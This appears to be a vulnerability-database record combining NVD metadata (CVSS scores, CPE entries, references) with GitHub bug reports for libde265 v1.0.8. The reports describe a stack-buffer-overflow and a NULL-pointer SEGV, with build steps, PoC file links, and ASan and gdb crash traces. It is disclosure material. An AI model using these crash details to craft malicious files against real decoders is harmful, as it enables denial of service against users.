[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/strukturag/libde265/issues/301" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Mailing List" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00027.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List" ], "url": "https://www.debian.org/security/2023/dsa-5346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/strukturag/libde265/issues/301" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mailing List" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00027.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List" ], "url": "https://www.debian.org/security/2023/dsa-5346" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.8:*:*:*:*:*:*:*", "matchCriteriaId": "E86A03B2-D0E9-4887-AD06-FBA3F3500FC3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/strukturag/libde265/issues/301
[ "Exploit", "Issue Tracking" ]
github.com
[ "strukturag", "libde265" ]
Hello, A stack-buffer-overflow has occurred when running program dec265 System info: Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0 Dec265 v1.0.8 [poc (4).zip](https://github.com/strukturag/libde265/files/6710061/poc.4.zip) Verification steps: 1.Get the source code of libde265 2.Compile ``` cd libde265 mkdir build && cd build cmake ../ -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_CXX_FLAGS="fsanitize=address" make -j 32 ``` 3.run dec265 ``` ./dec265 poc ``` asan info ``` ================================================================= ==1262407==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffeacbd65e3 at pc 0x7ff9ff7de308 bp 0x7ffeacbd3f00 sp 0x7ffeacbd3ef0 READ of size 2 at 0x7ffeacbd65e3 thread T0 #0 0x7ff9ff7de307 in void put_epel_hv_fallback<unsigned short>(short*, long, unsigned short const*, long, int, int, int, int, short*, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/fallback-motion.cc:352 #1 0x7ff9ff830067 in acceleration_functions::put_hevc_epel_hv(short*, long, void const*, long, int, int, int, int, short*, int) const /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/acceleration.h:328 #2 0x7ff9ff830067 in void mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/motion.cc:254 #3 0x7ff9ff8262ab in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/motion.cc:388 #4 0x7ff9ff828626 in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/motion.cc:2107 #5 0x7ff9ff89c8aa in read_coding_unit(thread_context*, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/slice.cc:4314 #6 0x7ff9ff8a48f2 in read_coding_quadtree(thread_context*, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/slice.cc:4652 #7 0x7ff9ff8a4e43 in read_coding_quadtree(thread_context*, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/slice.cc:4638 #8 0x7ff9ff8a4ace in read_coding_quadtree(thread_context*, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/slice.cc:4645 #9 0x7ff9ff8a4db9 in read_coding_quadtree(thread_context*, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/slice.cc:4641 #10 0x7ff9ff8a6564 in decode_substream(thread_context*, bool, bool) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/slice.cc:4741 #11 0x7ff9ff8a8ddb in read_slice_segment_data(thread_context*) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/slice.cc:5054 #12 0x7ff9ff78dd75 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/decctx.cc:843 #13 0x7ff9ff790c0f in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/decctx.cc:945 #14 0x7ff9ff791715 in decoder_context::decode_some(bool*) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/decctx.cc:730 #15 0x7ff9ff7949bb in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/decctx.cc:688 #16 0x7ff9ff795839 in decoder_context::decode_NAL(NAL_unit*) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/decctx.cc:1230 #17 0x7ff9ff796e1e in decoder_context::decode(int*) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/decctx.cc:1318 #18 0x5573510028fd in main /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/dec265/dec265.cc:764 #19 0x7ff9ff2e50b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #20 0x55735100576d in _start (/home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/out/dec265-afl+++0xa76d) Address 0x7ffeacbd65e3 is located in stack of thread T0 at offset 9315 in frame #0 0x7ff9ff82e67f in void mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/motion.cc:174 This frame has 2 object(s): [32, 9120) 'mcbuffer' (line 200) [9392, 14752) 'padbuf' (line 222) <== Memory access at offset 9315 underflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/fallback-motion.cc:352 in void put_epel_hv_fallback<unsigned short>(short*, long, unsigned short const*, long, int, int, int, int, short*, int) Shadow bytes around the buggy address: 0x100055972c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100055972c70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100055972c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100055972c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100055972ca0: 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 =>0x100055972cb0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2[f2]f2 f2 f2 0x100055972cc0: f2 f2 f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 0x100055972cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100055972ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100055972cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100055972d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1262407==ABORTING ```
stack-buffer-overflow in fallback-motion.cc when decoding file
https://api.github.com/repos/strukturag/libde265/issues/301/comments
2
2021-06-24T14:47:49Z
2023-01-27T12:18:10Z
https://github.com/strukturag/libde265/issues/301
929,307,435
301
2,977
CVE-2021-36411
2022-01-10T23:15:09.133
An issue has been found in libde265 v1.0.8 due to incorrect access control. A SEGV caused by a READ memory access in function derive_boundaryStrength of deblock.cc has occurred. The vulnerability causes a segmentation fault and application crash, which leads to remote denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/strukturag/libde265/issues/302" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Mailing List" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00027.html" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://www.debian.org/security/2023/dsa-5346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/strukturag/libde265/issues/302" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mailing List" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00027.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://www.debian.org/security/2023/dsa-5346" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.8:*:*:*:*:*:*:*", "matchCriteriaId": "E86A03B2-D0E9-4887-AD06-FBA3F3500FC3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/strukturag/libde265/issues/302
[ "Exploit", "Issue Tracking" ]
github.com
[ "strukturag", "libde265" ]
Hello, A SEGV of deblock.cc in function derive_boundaryStrength has occurred when running program dec265, source code ``` 283 if ((edgeFlags & transformEdgeMask) && 284 (img->get_nonzero_coefficient(xDi ,yDi) || 285 img->get_nonzero_coefficient(xDiOpp,yDiOpp))) { 286 bS = 1; 287 } 288 else { 289 290 bS = 0; 291 292 const PBMotion& mviP = img->get_mv_info(xDiOpp,yDiOpp); 293 const PBMotion& mviQ = img->get_mv_info(xDi ,yDi); 294 295 slice_segment_header* shdrP = img->get_SliceHeader(xDiOpp,yDiOpp); 296 slice_segment_header* shdrQ = img->get_SliceHeader(xDi ,yDi); 297 298 int refPicP0 = mviP.predFlag[0] ? shdrP->RefPicList[0][ mviP.refIdx[0] ] : -1; 299 int refPicP1 = mviP.predFlag[1] ? shdrP->RefPicList[1][ mviP.refIdx[1] ] : -1; 300 int refPicQ0 = mviQ.predFlag[0] ? shdrQ->RefPicList[0][ mviQ.refIdx[0] ] : -1; 301 int refPicQ1 = mviQ.predFlag[1] ? shdrQ->RefPicList[1][ mviQ.refIdx[1] ] : -1; 302 303 bool samePics = ((refPicP0==refPicQ0 && refPicP1==refPicQ1) || 304 (refPicP0==refPicQ1 && refPicP1==refPicQ0)); ``` **Due to incorrect access control, a SEGV caused by a READ memory access occurred at line 298 of the code. This issue can cause a Denial of Service attack.** System info: Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0 Dec265 v1.0.8 [poc.zip](https://github.com/strukturag/libde265/files/6716779/poc.zip) Verification steps: 1.Get the source code of libde265 2.Compile ``` cd libde265 mkdir build && cd build cmake ../ -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_CXX_FLAGS="fsanitize=address" make -j 32 ``` 3.run dec265(without asan) ``` ./dec265 poc ``` Output ``` WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: CTB outside of image area (concealing stream error...) WARNING: CTB outside of image area (concealing stream error...) Segmentation fault(core dumped) ``` AddressSanitizer output ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==3532158==ERROR: AddressSanitizer: SEGV on unknown address 0x0000000003d0 (pc 0x7f19b4f52978 bp 0x616000001580 sp 0x7fff00e87c20 T0) ==3532158==The signal is caused by a READ memory access. ==3532158==Hint: address points to the zero page. #0 0x7f19b4f52977 in derive_boundaryStrength(de265_image*, bool, int, int, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/deblock.cc:298 #1 0x7f19b4f56835 in apply_deblocking_filter(de265_image*) /home/dh/sda3/libde265-master/libde265-master/libde265/deblock.cc:1046 #2 0x7f19b4f7e626 in decoder_context::run_postprocessing_filters_sequential(de265_image*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:1880 #3 0x7f19b4f9baa0 in decoder_context::decode_some(bool*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:769 #4 0x7f19b4f9f95e in decoder_context::decode(int*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:1329 #5 0x55704ed8c8fd in main /home/dh/sda3/libde265-master/libde265-master/dec265/dec265.cc:764 #6 0x7f19b4aee0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #7 0x55704ed8f76d in _start (/home/dh/sda3/libde265-master/libde265-master/dec265+0xa76d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/dh/sda3/libde265-master/libde265-master/libde265/deblock.cc:298 in derive_boundaryStrength(de265_image*, bool, int, int, int, int) ==3532158==ABORTING ``` gdb info ``` [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: non-existing reference picture accessed WARNING: non-existing reference picture accessed WARNING: non-existing reference picture accessed WARNING: non-existing reference picture accessed WARNING: non-existing reference picture accessed WARNING: non-existing reference picture accessed WARNING: CTB outside of image area (concealing stream error...) WARNING: CTB outside of image area (concealing stream error...) Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x2 RCX: 0x61b000001580 --> 0xbebebebe00000000 RDX: 0x0 RSI: 0x7a ('z') RDI: 0x3d0 RBP: 0x616000001580 --> 0xbebebebe00000007 RSP: 0x7fffffff36e0 --> 0x3000000000 --> 0x0 RIP: 0x7ffff724b978 (<derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6024>: mov ebx,DWORD PTR [r9+r15*4+0x3b8]) R8 : 0x3 R9 : 0x0 R10: 0x6330000d6800 --> 0x8ffff00000101 R11: 0x6330000d6200 --> 0x60101 R12: 0x0 R13: 0xffffffffffffff90 R14: 0x7ffff31ff800 --> 0xbebebebebebebebe R15: 0x6 EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff724b96e <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6014>: jl 0x7ffff724b978 <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6024> 0x7ffff724b970 <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6016>: test dl,dl 0x7ffff724b972 <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6018>: jne 0x7ffff724dd87 <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+15255> => 0x7ffff724b978 <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6024>: mov ebx,DWORD PTR [r9+r15*4+0x3b8] 0x7ffff724b980 <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6032>: mov edx,0x376d 0x7ffff724b985 <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6037>: mov eax,0xafce 0x7ffff724b98a <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6042>: lea r15,[r11+0x1] 0x7ffff724b98e <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6046>: mov rdi,r15 [------------------------------------stack-------------------------------------] 0000| 0x7fffffff36e0 --> 0x3000000000 --> 0x0 0008| 0x7fffffff36e8 --> 0x6160000016f8 --> 0x4000000080 --> 0x0 0016| 0x7fffffff36f0 --> 0x6160000016e8 --> 0x625000057900 --> 0x0 0024| 0x7fffffff36f8 --> 0xa000000080 --> 0x0 0032| 0x7fffffff3700 --> 0x1 0040| 0x7fffffff3708 --> 0xbf000000c0 --> 0x0 0048| 0x7fffffff3710 --> 0x61600000167c --> 0x4000000003 --> 0x0 0056| 0x7fffffff3718 --> 0xff00f800 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x00007ffff724b978 in derive_boundaryStrength (img=img@entry=0x616000001580, vertical=vertical@entry=0x0, yStart=yStart@entry=0x0, yEnd=<optimized out>, xStart=xStart@entry=0x0, xEnd=<optimized out>) at /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/deblock.cc:298 298 int refPicP0 = mviP.predFlag[0] ? shdrP->RefPicList[0][ mviP.refIdx[0] ] : -1; ```
A SEGV has occurred when running program dec265
https://api.github.com/repos/strukturag/libde265/issues/302/comments
3
2021-06-25T14:41:05Z
2023-01-27T12:50:07Z
https://github.com/strukturag/libde265/issues/302
930,239,357
302
2,978